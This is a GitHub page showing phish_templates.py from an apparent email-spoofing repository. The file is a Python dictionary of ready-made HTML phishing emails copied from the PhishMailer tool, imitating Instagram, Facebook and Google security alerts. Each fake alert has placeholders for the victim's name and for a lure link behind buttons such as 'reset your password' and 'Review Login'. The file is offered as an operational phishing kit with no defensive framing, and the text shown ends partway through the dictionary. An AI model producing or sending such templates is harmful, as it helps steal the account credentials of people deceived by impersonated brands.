forked from Triotion/email-spoofing
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathphish_templates.py
More file actions
2664 lines (2310 loc) · 207 KB
/
phish_templates.py
File metadata and controls
2664 lines (2310 loc) · 207 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
"""
Phishing Templates Extracted from PhishMailer
"""
PHISH_TEMPLATES = {
"instagram": r'''<div dir="ltr" style="margin: 0; padding: 0;">
<table id="m_-7319109037895721555email_table" style="border-collapse: collapse;" border="0" width="100%;" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td id="m_-7319109037895721555email_content" style="font-family: Helvetica Neue,Helvetica,Lucida Grande,tahoma,verdana,arial,sans-serif; background: #ffffff;">
<table style="border-collapse: collapse;" width="100%" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="line-height: 20px;" colspan="3" height="20"> </td>
</tr>
<tr>
<td style="line-height: 1px;" colspan="3" height="1"> </td>
</tr>
<tr>
<td>
<table style="border-collapse: collapse; border: solid 1px white; margin: 0 auto 5px auto; padding: 3px 0; text-align: center; width: 430px;" width="100%" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="width: 15px;" width="15px"> </td>
<td style="line-height: 0px; width: 400px; padding: 0 0 15px 0;">
<table style="border-collapse: collapse;" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="width: 100%; text-align: left; height: 33px;"><img class="CToWUd" style="border: 0;" src="https://ci5.googleusercontent.com/proxy/JecDtiZNt9PEkLjyKXOHG6GQJ4ffCEmhMipCKh2K44CFFTTQUmX11SuvnJHe12oZWnvgg-vCdZYtV8qkSIKai4k6xSrxMCMtJH43fzHt1VFA6g=s0-d-e1-ft#https://static.xx.fbcdn.net/rsrc.php/v3/yr/r/jxR-EPx51R9.png" height="33" /></td>
</tr>
</tbody>
</table>
</td>
<td style="width: 15px;" width="15px"> </td>
</tr>
<tr>
<td style="width: 15px;" width="15px"> </td>
<td style="border-top: solid 1px #c8c8c8;"> </td>
<td style="width: 15px;" width="15px"> </td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td>
<table style="border-collapse: collapse; margin: 0 auto 0 auto;" width="430" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td>
<table style="border-collapse: collapse; margin: 0 auto 0 auto; width: 430px;" width="430px" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="display: block; width: 15px;" width="15"> </td>
</tr>
<tr>
<td>
<table style="border-collapse: collapse;" width="100%" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td>
<table style="border-collapse: collapse;" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="display: block; width: 20px;" width="20"> </td>
<td>
<table style="border-collapse: collapse;" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td>
<p style="padding: 0; margin: 10px 0 10px 0; color: #565a5c; font-size: 18px;">Hi {},</p>
<p style="padding: 0; margin: 10px 0 10px 0; color: #565a5c; font-size: 18px;">Someone tried to log in to your Instagram account {}.</p>
<p style="padding: 0; margin: 10px 0 10px 0; color: #565a5c; font-size: 18px;">If this was you, please use the following code to log in:</p>
<p style="padding: 0; margin: 10px 0 10px 0; color: #565a5c; font-size: 18px;"><span style="font-size: xx-large;">313013</span></p>
<p style="padding: 0; margin: 10px 0 10px 0; color: #565a5c; font-size: 18px;">If this wasn't you, please <a style="color: #3b5998; text-decoration: none;" href="{}" target="_blank" rel="noopener">reset your password</a> to secure your account.</p>
</td>
</tr>
</tbody>
</table>
</td>
<td style="display: block; width: 20px;" width="20"> </td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td>
<table style="border-collapse: collapse; margin: 0 auto 0 auto; width: 430px;" width="430px" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="line-height: 30px;" colspan="3" height="30"> </td>
</tr>
<tr>
<td style="display: block; width: 20px;" width="20"> </td>
<td>
<div style="color: #abadae; font-size: 12px; margin: 0 auto 5px auto;">© Instagram, Menlo Park, CA 94022</div>
<div style="color: #abadae; font-size: 12px; margin: 0 auto 5px auto;">This message was sent to <a style="color: #abadae; text-decoration: underline;">{}</a> and intended for {}. Not your account? <a style="color: #abadae; text-decoration: underline;" target="_blank" rel="noopener">Remove your email</a> from this account.</div>
</td>
<td style="display: block; width: 20px;" width="20"> </td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td style="line-height: 20px;" colspan="3" height="20"> </td>
</tr>
</tbody>
</table>
<img class="CToWUd" style="border: 0; width: 1px; height: 1px;" src="https://ci6.googleusercontent.com/proxy/f8TdjWWQZLbPuhgu8Gz1qsup6-I9BGWATWktPEUEU4u3RYuDO6deCw2HefCgsGg7hPSe_o7aRGaEmT5eWgbbwrXbav3ivvIxslWLXecN82F4_4M8H7SteqmpOyGarWOjk28YfUHllow0QTWrPMq2HuYbfF5Q4TRWM3y3=s0-d-e1-ft#https://www.facebook.com/email_open_log_pic.php?mid=HMjU0MTE4NTg0OmFwaXpwdWRpbjk2QGdtYWlsLmNvbToxNTg3" /></td>
</tr>
</tbody>
</table>
</div>''',
"facebook": r'''<html><head></head><body><div style="margin:0;padding:0" dir="ltr" bgcolor="#ffffff"><table cellspacing="0" cellpadding="0" width="100%;" id="m_-5140787778864602591email_table" border="0" style="border-collapse:collapse"><tbody><tr><td id="m_-5140787778864602591email_content" style="font-family:Helvetica Neue,Helvetica,Lucida Grande,tahoma,verdana,arial,sans-serif;background:#ffffff"><table cellspacing="0" cellpadding="0" width="100%" style="border-collapse:collapse"><tbody><tr><td height="20" style="line-height:20px" colspan="3"> </td></tr><tr><td height="1" colspan="3" style="line-height:1px"><span style="color:#ffffff;display:none!important;font-size:1px"></span></td></tr><tr><td width="15" style="display:block;width:15px"> </td><td><table cellspacing="0" cellpadding="0" width="100%" style="border-collapse:collapse"><tbody><tr><td height="16" style="line-height:16px" colspan="3"> </td></tr><tr><td width="32" align="left" valign="middle" style="height:32;line-height:0px"><a style="color:#3b5998;text-decoration:none" target="_blank"><img src="https://ci6.googleusercontent.com/proxy/EtxfQKU-LSNk3Cs2UEF2iTtMjX4XBhsW4wkC-6_XBZV22W3eB-S2JrRw027OocPIFPltHMAtxKA8QWOzc47CUrqu5jLKr9lWj_dvd8Dd1TZEpA=s0-d-e1-ft#https://static.xx.fbcdn.net/rsrc.php/v3/yk/r/_2faPUZhPI6.png" width="32" height="32" style="border:0" class="CToWUd"></a></td><td width="15" style="display:block;width:15px"> </td><td width="100%"><a style="color:#3b5998;text-decoration:none;font-family:Helvetica Neue,Helvetica,Lucida Grande,tahoma,verdana,arial,sans-serif;font-size:19px;line-height:32px" target="_blank" >Login Alert</a></td></tr><tr style="border-bottom:solid 1px #e5e5e5"><td height="16" style="line-height:16px" colspan="3"> </td></tr></tbody></table></td><td width="15" style="display:block;width:15px"> </td></tr><tr><td width="15" style="display:block;width:15px"> </td><td><table cellspacing="0" cellpadding="0" width="100%" style="border-collapse:collapse"><tbody><tr><td height="28" style="line-height:28px"> </td></tr><tr><td><span class="m_-5140787778864602591mb_text" style="font-family:Helvetica Neue,Helvetica,Lucida Grande,tahoma,verdana,arial,sans-serif;font-size:16px;line-height:21px;font-weight:bold;color:#141823">Hi {},</span></td></tr><tr><td height="14" style="line-height:14px"> </td></tr><tr><td><span class="m_-5140787778864602591mb_text" style="font-family:Helvetica Neue,Helvetica,Lucida Grande,tahoma,verdana,arial,sans-serif;font-size:16px;line-height:21px;color:#141823">Your account was recently logged into from an unrecognized browser or device. Was this you?</span></td></tr><tr><td height="14" style="line-height:14px"> </td></tr><tr><td><span style="font-size:10px;font-weight:bold;color:#777">New Login</span></td></tr><tr><td height="14" style="line-height:14px"> </td></tr><tr><td></td></tr><tr style="border-top:solid 1px #e5e5e5"><td height="0" style="line-height:0px"> </td></tr><tr><td height="14" style="line-height:14px"> </td></tr><tr><td><table cellspacing="0" cellpadding="0" width="100%" align="left" class="m_-5140787778864602591ib_t" style="border-collapse:collapse;min-width:420px"><tbody><tr class="m_-5140787778864602591ib_row"><td valign="top" style="padding-right:10px;font-size:0px" class="m_-5140787778864602591ib_img"><img src="https://ci6.googleusercontent.com/proxy/DCTANTsJ1OvRNB6zZT48v37sH3JcbGz_I6HAHayvNwCn1Rob8r9MiKJ1BR-r5XeHt81lkel1D5_MiAsHRpqRfDmyzTkj2HyqQGpas_2qBbC-jg=s0-d-e1-ft#https://static.xx.fbcdn.net/rsrc.php/v3/y2/r/OUnczqecsPd.png" width="16px" height="16px" style="border:0" class="CToWUd"></td><td width="100%" valign="top" style="padding-right:10px" class="m_-5140787778864602591ib_mid"><span class="m_-5140787778864602591mb_text" style="font-family:Helvetica Neue,Helvetica,Lucida Grande,tahoma,verdana,arial,sans-serif;font-size:16px;line-height:21px;color:#141823"> {} {}, {} at {}</span></td></tr></tbody></table></td></tr><tr><td height="14" style="line-height:14px"> </td></tr><tr><td></td></tr><tr style="border-top:solid 1px #e5e5e5"><td height="0" style="line-height:0px"> </td></tr><tr><td height="14" style="line-height:14px"> </td></tr><tr><td><table cellspacing="0" cellpadding="0" width="100%" align="left" class="m_-5140787778864602591ib_t" style="border-collapse:collapse;min-width:420px"><tbody><tr class="m_-5140787778864602591ib_row"><td valign="top" style="padding-right:10px;font-size:0px" class="m_-5140787778864602591ib_img"><img src="https://ci5.googleusercontent.com/proxy/QBDrjhzwIX48mu2IPh7LHsNkIiAd7lRdk76BILhcwZS9DS_KAimbh1JSh1MNokIqcjZNHvhX8is9-3t0O_8_RCsPfHnvT2X0TDGT7hbhPQOxng=s0-d-e1-ft#https://static.xx.fbcdn.net/rsrc.php/v3/yn/r/HLjP6-RaBz8.png" width="16px" height="16px" style="border:0" class="CToWUd"></td><td width="100%" valign="top" style="padding-right:10px" class="m_-5140787778864602591ib_mid"><span class="m_-5140787778864602591mb_text" style="font-family:Helvetica Neue,Helvetica,Lucida Grande,tahoma,verdana,arial,sans-serif;font-size:16px;line-height:21px;color:#141823">Near {}, {}</span></td></tr></tbody></table></td></tr><tr><td height="14" style="line-height:14px"> </td></tr><tr><td></td></tr><tr style="border-top:solid 1px #e5e5e5"><td height="0" style="line-height:0px"> </td></tr><tr><td height="14" style="line-height:14px"> </td></tr><tr><td><table cellspacing="0" cellpadding="0" width="100%" align="left" class="m_-5140787778864602591ib_t" style="border-collapse:collapse;min-width:420px"><tbody><tr class="m_-5140787778864602591ib_row"><td valign="top" style="padding-right:10px;font-size:0px" class="m_-5140787778864602591ib_img"><img src="https://ci3.googleusercontent.com/proxy/6eUh9zO42iKU02o2lX-pLc3uDyVFjkGqvjU7jnDgBNwGngV7cFiIa3DPoWtXpkyXqhygmeah586FIXGGQYGa6bw_Y9xD7ltzGQwaFLbzznqHzA=s0-d-e1-ft#https://static.xx.fbcdn.net/rsrc.php/v3/yH/r/FOZusRNk18E.png" width="16px" height="16px" style="border:0" class="CToWUd"></td><td width="100%" valign="top" style="padding-right:10px" class="m_-5140787778864602591ib_mid"><span class="m_-5140787778864602591mb_text" style="font-family:Helvetica Neue,Helvetica,Lucida Grande,tahoma,verdana,arial,sans-serif;font-size:16px;line-height:21px;color:#141823">Google Chrome</span></td></tr></tbody></table></td></tr><tr><td height="14" style="line-height:14px"> </td></tr></tbody></table></td><td width="15" style="display:block;width:15px"> </td></tr><tr><td width="15" style="display:block;width:15px"> </td><td><table cellspacing="0" cellpadding="0" width="100%" style="border-collapse:collapse"><tbody><tr><td height="2" style="line-height:2px" colspan="3"> </td></tr><tr><td class="m_-5140787778864602591mb_blk"><a href="{}" style="color:#3b5998;text-decoration:none" target="_blank"><table cellspacing="0" cellpadding="0" width="100%" style="border-collapse:collapse"><tbody><tr><td style="border-collapse:collapse;border-radius:2px;text-align:center;display:block;border:solid 1px #344c80;background:#4c649b;padding:7px 16px 11px 16px"><a href="{}" style="color:#3b5998;text-decoration:none;display:block" target="_blank"><center><font size="3"><span style="font-family:Helvetica Neue,Helvetica,Lucida Grande,tahoma,verdana,arial,sans-serif;white-space:nowrap;font-weight:bold;vertical-align:middle;color:#ffffff;font-size:14px;line-height:14px">Review Login</span></font></center></a></td></tr></tbody></table></a></td><td width="10" style="display:block;width:10px" class="m_-5140787778864602591mb_hide"> </td><td class="m_-5140787778864602591mb_blk"><a href="{}" style="color:#3b5998;text-decoration:none" target="_blank"><table cellspacing="0" cellpadding="0" width="100%" style="border-collapse:collapse"><tbody><tr><td style="border-collapse:collapse;border-radius:2px;text-align:center;display:block;border:solid 1px #c9ccd1;background:#f6f7f8;padding:7px 16px 11px 16px"><a href="{}" style="color:#3b5998;text-decoration:none;display:block" target="_blank"><center><font size="3"><span style="font-family:Helvetica Neue,Helvetica,Lucida Grande,tahoma,verdana,arial,sans-serif;white-space:nowrap;font-weight:bold;vertical-align:middle;color:#525252;font-size:14px;line-height:14px">Manage Alerts</span></font></center></a></td></tr></tbody></table></a></td><td width="100%" class="m_-5140787778864602591mb_hide"></td></tr><tr><td height="32" style="line-height:32px" colspan="3"> </td></tr></tbody></table></td><td width="15" style="display:block;width:15px"> </td></tr><tr><td width="15" style="display:block;width:15px"> </td><td><table cellspacing="0" cellpadding="0" width="100%" style="border-collapse:collapse"><tbody><tr style="border-top:solid 1px #e5e5e5"><td height="16" style="line-height:16px"> </td></tr><tr><td style="font-family:Helvetica Neue,Helvetica,Lucida Grande,tahoma,verdana,arial,sans-serif;font-size:11px;color:#aaaaaa;line-height:16px">This message was sent to <a href="" style="color:#3b5998;text-decoration:none" target="_blank">{}/a>. If you don't want to receive these emails from Facebook in the future, please <a href="" style="color:#3b5998;text-decoration:none" target="_blank" data-saferedirecturl="#link11">unsubscribe</a>.<br>Facebook, Inc., Attention: Community Support, 1 Hacker Way, Menlo Park, CA 94025</td></tr></tbody></table></td><td width="15" style="display:block;width:15px"> </td></tr><tr><td height="20" style="line-height:20px" colspan="3"> </td></tr></tbody></table><span><img src="https://ci5.googleusercontent.com/proxy/HW2B-_UGsdk69Jyhg1T6TPoP85hYe1BMFUnXG1tzXLvolAUwH6t0YiIo4qp5aCDfKneX2WoPW8rAE0T34kLDIX0mSXZNOiQuEaPUHdAvImAazBZauNI1_PSndHlRvKy951jvWI5bsvfOh2oBJC7IqpAoyZXzYQ=s0-d-e1-ft#https://www.facebook.com/email_open_log_pic.php?mid=5464d188693c7G5af398d232efG5464d621c9699G2bf" style="border:0;width:1px;height:1px" class="CToWUd"></span></td></tr></tbody></table></div></div></div> </div></div></div></div></div></div></div></div></body></html>''',
"gmail": r'''<table style="min-width: 348px; width: 100%; height: 100%;" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr align="center">
<td width="32px"> </td>
<td>
<table style="max-width: 600px;" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td>
<table style="width: 100%;" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td align="left"><img class="CToWUd" style="display: block; width: 92px; height: 32px;" src="https://ci3.googleusercontent.com/proxy/EURRrDHt1LcCbHcRdDtMHOQPPMHe5FkDsMAHs66gxAIYzYD38Abpa1Fmy-ACuq2V1tI8GZdWA4FLsXjKM4iAD-CixwUocANswARkdK1ttXK-T1DDSfiUplKFys37dkM=s0-d-e1-ft#https://www.gstatic.com/accountalerts/email/googlelogo_color_188x64dp.png" alt="" width="92" height="32" /></td>
<td align="right"><img class="CToWUd" style="display: block; width: 32px; height: 32px;" src="https://ci6.googleusercontent.com/proxy/w8ACgsIEmhjGKodu731Z-VOiYfmXsRM4zd6F_w4_cKQ1JPXF_6Y_hEPR_iJKee33yGZ8zR6o_Q08vuYMKmetfyoGNtMpt1d5CU6z3xA=s0-d-e1-ft#https://www.gstatic.com/accountalerts/email/keyhole.png" alt="" width="32" height="32" /></td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td>
<table style="min-width: 332px; max-width: 600px; border-width: 1px 1px 0px; border-image: initial; border-top-left-radius: 3px; border-top-right-radius: 3px; width: 100%; border-color: #e0e0e0 #e0e0e0 initial #e0e0e0; border-style: solid solid initial solid;" border="0" cellspacing="0" cellpadding="0" bgcolor="#4184F3">
<tbody>
<tr>
<td colspan="3" height="72px"> </td>
</tr>
<tr>
<td width="32px"> </td>
<td style="font-family: Roboto-Regular,Helvetica,Arial,sans-serif; font-size: 24px; color: #ffffff; line-height: 1.25;">New <span class="il">sign</span>-in from Chrome on Windows</td>
<td width="32px"> </td>
</tr>
<tr>
<td colspan="3" height="18px"> </td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td>
<table style="min-width: 332px; max-width: 600px; border-width: 0px 1px 1px; border-image: initial; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; width: 100%; border-color: initial #f0f0f0 #c0c0c0 #f0f0f0; border-style: initial solid solid solid;" border="0" cellspacing="0" cellpadding="0" bgcolor="#FAFAFA">
<tbody>
<tr>
<td rowspan="3" width="32px"> </td>
<td> </td>
<td rowspan="3" width="32px"> </td>
</tr>
<tr>
<td>
<table style="min-width: 300px;" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="font-family: Roboto-Regular,Helvetica,Arial,sans-serif; font-size: 13px; color: #202120; line-height: 1.5;">Hi {},</td>
</tr>
<tr>
<td style="font-family: Roboto-Regular,Helvetica,Arial,sans-serif; font-size: 13px; color: #202120; line-height: 1.5;">Your Google Account <a>{}</a> was just used to <span class="il">sign</span> in from <span style="white-space: nowrap;">Chrome</span> on <span style="white-space: nowrap;">Windows</span>.
<table style="margin-top: 48px; margin-bottom: 48px;" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr valign="middle">
<td width="32px"> </td>
<td align="center"><img class="CToWUd" style="width: 48px; height: 48px; display: block; border-radius: 50%;" src="https://lh3.googleusercontent.com/-bQZ5NhEHURU/WL5aUNfXA1I/AAAAAAAAAA4/gTy3xQfIhFEyPcxScplho8gYxNp1xC3lwCEw/w140-h140-p/34AD2.jpg" alt="" width="48px" height="48px" /></td>
<td width="16px"> </td>
<td style="line-height: 1.2;"><span style="font-family: Roboto-Regular,Helvetica,Arial,sans-serif; font-size: 20px; color: #202120;">{}</span><br /><span style="font-family: Roboto-Regular,Helvetica,Arial,sans-serif; font-size: 13px; color: #727272;"><a>{}</a></span></td>
</tr>
<tr valign="middle">
<td width="32px" height="24px"> </td>
<td align="center" height="24px"><img class="CToWUd" style="width: 4px; height: 10px; display: block;" src="https://ci4.googleusercontent.com/proxy/3v5djkrQw0eYYuEXwiOUoxXYc3R6bFSVEFNL0C3YbDgAYCp7sUIL4fxyDZ8RADuKX3gZ4_z6bAmrACIqNYpHa95AfUrSskjfkEf4nDXRH7A=s0-d-e1-ft#https://www.gstatic.com/accountalerts/email/down_arrow.png" alt="" width="4px" height="10px" /></td>
</tr>
<tr valign="top">
<td width="32px"> </td>
<td align="center"><img class="CToWUd" style="width: 48px; height: 48px; display: block;" src="https://ci6.googleusercontent.com/proxy/8-TvqI07V6c6EfMmOpioytN1akb1_MYoQR5JjP9FrOcBKg-A1ob9_8rI-og2hhemR-SKt-PTzEc8LHrxdtQOnK5WmXqFWq16_l4IuCD9uPzGQipSyU_VqCQpBegNZjcIuYnKtg=s0-d-e1-ft#https://www.gstatic.com/accountalerts/devices/windows_laptop_wallpaper_big.png" alt="" width="48px" height="48px" /></td>
<td width="16px"> </td>
<td style="line-height: 1.2;"><span style="font-family: Roboto-Regular,Helvetica,Arial,sans-serif; font-size: 16px; color: #202120;">Windows</span><br /><span style="font-family: Roboto-Regular,Helvetica,Arial,sans-serif; font-size: 13px; color: #727272;">{}, {} {}, {} {}<br /> {}, {}<br />Chrome</span></td>
</tr>
</tbody>
</table>
<strong>Don't recognize this activity?</strong><br />Review your <a style="text-decoration: none; color: #4285f4;" href="{}" target="_blank" rel="noopener">recently used devices</a> now.<br /><br />Why are we sending this? We take security very seriously and we want to keep you in the loop on important actions in your account.<br />We were unable to determine whether you have used this browser or device with your account before. This can happen when you <span class="il">sign</span> in for the first time on a new computer, phone or browser, when you use your browser's incognito or private browsing mode or clear your cookies, or when somebody else is accessing your account.</td>
</tr>
<tr>
<td style="font-family: Roboto-Regular,Helvetica,Arial,sans-serif; font-size: 13px; color: #202120; line-height: 1.5;">Best,<br />The Google Accounts team</td>
</tr>
<tr>
<td>
<table style="font-family: Roboto-Regular,Helvetica,Arial,sans-serif; font-size: 12px; color: #b9b9b9; line-height: 1.5;">
<tbody>
<tr>
<td>*The location is approximate and determined by the IP address it was coming from.</td>
</tr>
<tr>
<td>This email can't receive replies. To give us feedback on this alert, <a style="text-decoration: none; color: #4285f4;" href="{}" target="_blank" rel="noopener">click here</a>.<br />For more information, visit the <a style="text-decoration: none; color: #4285f4;" href="{}" target="_blank" rel="noopener">Google Accounts Help Center</a>.</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td style="max-width: 600px; font-family: Roboto-Regular,Helvetica,Arial,sans-serif; font-size: 10px; color: #bcbcbc; line-height: 1.5;"> </td>
</tr>
<tr>
<td>
<table style="font-family: Roboto-Regular,Helvetica,Arial,sans-serif; font-size: 10px; color: #666666; line-height: 18px; padding-bottom: 10px;">
<tbody>
<tr>
<td>You received this mandatory email service announcement to update you about important changes to your Google product or account.</td>
</tr>
<tr>
<td>
<div style="direction: ltr; text-align: left;">© {} Google Inc., 1600 Amphitheatre Parkway, Mountain View, CA 94043, USA</div>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
</td>
<td width="32px"> </td>
</tr>
</tbody>
</table>
<p><br /><br /></p>''',
"gmail_simple": r'''<div style="margin: 0; padding: 0;"><img src="https://notifications.googleapis.com/email/t/AFG8qyX1N_r29I45LMotMWsye64za9dbvJiyZgdgizAGJw1L7gbGf8c45Hpsrd2cJlaFZnZCfo8rbM6s1bJe91QnxNeUB2v7DpR9BJkQ6RScy8EfVFqaQS1DG_fW9CnrF2NMvgM9Caq7MczU-jDToF4iWHKayK4ji5x1qf6LozELELyhyTmFDalDEplYkEtbUM6dJF3HqWcsLqmQq4TrbbFtGcoIg-wEc76Skkq59dys8PX_Cm5T12R7I-hcd9jLZaukEASj_0r_0GkmpfRp-ulF7yvIuE7Z5O4stFo/a.gif" width="1" height="1" />
<table lang="en" style="min-width: 348px;" border="0" width="100%" cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 32px;">
<td> </td>
</tr>
<tr align="center">
<td>
<div> </div>
<table style="padding-bottom: 20px; max-width: 516px; min-width: 220px;" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td style="width: 8px;" width="8"> </td>
<td>
<div style="border-radius: 8px; padding: 40px 20px; border: thin solid #dadce0;" align="center"><img style="margin-bottom: 16px;" src="https://www.gstatic.com/images/branding/googlelogo/2x/googlelogo_color_74x24dp.png" alt="Google" width="74" height="24" />
<div style="font-family: 'Google Sans',Roboto,RobotoDraft,Helvetica,Arial,sans-serif; border-bottom: thin solid #dadce0; color: rgba(0,0,0,0.87); line-height: 32px; padding-bottom: 24px; text-align: center; word-break: break-word;">
<div style="text-align: center; padding-bottom: 16px; line-height: 0;"><img src="https://www.gstatic.com/images/icons/material/system/2x/error_red_36dp.png" height="33" /></div>
<div style="font-size: 24px;">Sign-in attempt was blocked</div>
<table style="margin-top: 8px;" align="center">
<tbody>
<tr style="line-height: normal;">
<td style="padding-right: 8px;" align="right"><img style="width: 20px; height: 20px; vertical-align: sub; border-radius: 50%;" src="https://www.gstatic.com/accountalerts/email/anonymous_profile_photo.png" alt="" width="20" height="20" /></td>
<td><a style="font-family: 'Google Sans',Roboto,RobotoDraft,Helvetica,Arial,sans-serif; color: rgba(0,0,0,0.87); font-size: 14px; line-height: 20px;">{}</a></td>
</tr>
</tbody>
</table>
</div>
<div style="font-family: Roboto-Regular,Helvetica,Arial,sans-serif; font-size: 14px; color: rgba(0,0,0,0.87); line-height: 20px; padding-top: 20px; text-align: left;">Someone just used your password to try to sign in to your account from a non-Google app. Google blocked them, but you should check what happened. Review your account activity to make sure no one else has access.
<div style="padding-top: 32px; text-align: center;"><a style="font-family: 'Google Sans',Roboto,RobotoDraft,Helvetica,Arial,sans-serif; line-height: 16px; color: #ffffff; font-weight: 400; text-decoration: none; font-size: 14px; display: inline-block; padding: 10px 24px; background-color: #d94235; border-radius: 5px; min-width: 90px;" href="{}" target="_blank" rel="noopener">Check activity</a></div>
</div>
</div>
<div style="text-align: left;">
<div style="font-family: Roboto-Regular,Helvetica,Arial,sans-serif; color: rgba(0,0,0,0.54); font-size: 11px; line-height: 18px; padding-top: 12px; text-align: center;">
<div>You received this email to let you know about important changes to your Google Account and services.</div>
<div style="direction: ltr;">© 2021 Google LLC, <a style="font-family: Roboto-Regular,Helvetica,Arial,sans-serif; color: rgba(0,0,0,0.54); font-size: 11px; line-height: 18px; padding-top: 12px; text-align: center;">1600 Amphitheatre Parkway, Mountain View, CA 94043, USA</a></div>
</div>
</div>
</td>
<td style="width: 8px;" width="8"> </td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr style="height: 32px;">
<td> </td>
</tr>
</tbody>
</table>
</div>''',
